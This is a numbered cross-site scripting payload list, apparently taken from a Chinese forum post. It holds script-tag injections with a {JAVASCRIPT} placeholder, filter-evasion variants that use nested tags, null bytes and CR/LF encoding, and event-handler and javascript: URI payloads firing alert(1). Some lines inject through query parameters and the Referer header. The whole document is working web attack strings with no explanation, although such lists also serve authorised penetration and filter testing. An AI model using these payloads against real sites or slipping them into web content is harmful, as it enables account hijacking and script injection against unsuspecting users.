xss payload

admin

1. <script>{JAVASCRIPT}</script>
   
2. 
   
3. <scr ipt>{JAVASCRIPT}</scr ipt>
   
4. 
   
5. "><script>{JAVASCRIPT}</script>
   
6. 
   
7. "><script>{JAVASCRIPT}</script><"
   
8. 
   
9. '><script>{JAVASCRIPT}</script>
   
10. 
    
11. '><script>{JAVASCRIPT}</script><'
    
12. 
    
13. <SCRIPT>{JAVASCRIPT};</SCRIPT>
    
14. 
    
15. <scri<script>pt>{JAVASCRIPT};</scr</script>ipt>
    
16. 
    
17. <SCRI<script>PT>{JAVASCRIPT};</SCR</script>IPT>
    
18. 
    
19. <scri<scr<script>ipt>pt>{JAVASCRIPT};</scr</sc</script>ript>ipt>
    
20. 
    
21. ";{JAVASCRIPT};"
    
22. 
    
23. ';{JAVASCRIPT};'
    
24. 
    
25. ;{JAVASCRIPT};
    
26. 
    
27. {JAVASCRIPT};
    
28. 
    
29. <SCR%00IPT>{JAVASCRIPT}</SCR%00IPT>
    
30. 
    
31. ";{JAVASCRIPT};//
    
32. 
    
33. <STYLE TYPE="text/javascript">{JAVASCRIPT};</STYLE>
    
34. 
    
35. <<SCRIPT>{JAVASCRIPT}//<</SCRIPT>
    
36. 
    
37. "{EVENTHANDLER}={JAVASCRIPT}
    
38. 
    
39. <<SCRIPT>{JAVASCRIPT}//<</SCRIPT>
    
40. 
    
41. <img src="1" onerror="{JAVASCRIPT}">
    
42. 
    
43. <img src='1' onerror='{JAVASCRIPT}'
    
44. 
    
45. onerror="{JAVASCRIPT}"
    
46. 
    
47. onerror='{JAVASCRIPT}'
    
48. 
    
49. onload="{JAVASCRIPT}"
    
50. 
    
51. onload='{JAVASCRIPT}'
    
52. 
    
53. <IMG """><SCRIPT>{JAVASCRIPT}</SCRIPT>">
    
54. 
    
55. <IMG '''><SCRIPT>{JAVASCRIPT}</SCRIPT>'>
    
56. 
    
57. """><SCRIPT>{JAVASCRIPT}
    
58. 
    
59. '''><SCRIPT>{JAVASCRIPT}'
    
60. 
    
61. <IFRAME SRC='f' onerror="{JAVASCRIPT}"></IFRAME>
    
62. 
    
63. <IFRAME SRC='f' onerror='{JAVASCRIPT}'></IFRAME>
    
64. 
    
65. <script>alert</script>
    
66. 
    
67. " onmouseover=alert(1)><br><br>
    
68. 
    
69. " onclick=alert(1)<br>
    
70. 
    
71.   ' onmouseover=alert(1)//
    
72. 
    
73. <input name=keyword value=" " onclick=alert(1) //">
    
74. 
    
75. javascript:alert(1)
    
76. 
    
77. javascript:alert`1`
    
78. 
    
79. javascript:alert`1`
    
80. 
    
81. javascript:alert(1)//http://xxx.com  //利用注释
    
82. 
    
83. javascript:%0dhttp://xxx.com%0dalert(1) //不利用注释
    
84. 
    
85. keyword = test&t_sort="type="text" onclick = "alert(1)
    
86. 
    
87. keyword = test&t_sort="type="text" onmouseover="alert(1)
    
88. 
    
89. Referer: " onmouseover=alert(1) type="text"
    
90. 
    
91. Referer: " onclick="alert(1) type="text"
    
92. 
    
93. <img%0Dsrc=1%0Donerror=alert(1)>
    
94. 
    
95. <iframe%0asrc=x%0donmouseover=alert`1`></iframe>
    
96. 
    
97. <svg%0aonload=alert`1`></svg>

复制代码